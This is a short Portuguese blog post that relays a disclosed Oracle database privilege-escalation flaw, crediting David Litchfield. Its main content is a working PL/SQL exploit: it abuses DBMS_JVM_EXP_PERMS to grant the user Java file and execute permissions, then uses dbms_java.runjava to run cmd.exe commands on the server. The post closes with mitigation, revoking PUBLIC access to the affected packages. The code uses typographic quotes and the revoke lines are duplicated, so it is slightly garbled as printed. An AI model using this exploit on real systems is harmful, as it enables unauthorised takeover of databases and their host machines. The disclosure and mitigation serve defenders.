O crédito desta descoberta vai para David Litchfield, ele encontrou essa vulnerabilidade que também afeta 11g R2.

Priviégios indevidos as procedures Java permitem que usuários aumentem seus próprios privilégios, sendo até possível ganhar controle completo sobre o banco de dados.

Basicamente, usando a package DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS o usuário pode mudar seus privilégios na tabela a política do Java, para que a JVM permite-lhe executar comandos do sistema operacional e de ler e escrever arquivos.

Aqui está o código:

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS 
  SELECT ‘GRANT’,USER(),
         ‘SYS’,
         ’java.io.FilePermission’,
         ’<<ALL FILES>>‘,
         ’execute’,
         ’ENABLED’
    FROM dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

Após a elevação dos privilégios Java é possível executar comandos no sistema operacional usando uma instrução SELECT simples:

select dbms_java.runjava('Oracle/Aurora/util/Wrapper c:\windows\\system32\cmd.exe\' ||
                         '/c dir > c:\out.lst')

  from dual;

Ainda não tem um patch para esta falha, mas você pode (e deve) revogar os privilégios do PUBLIC para os seguintes pacotes:

revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from  public;
revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from  public;

trevis

[]s!

Fonte: http://tiny.cc/NYU6T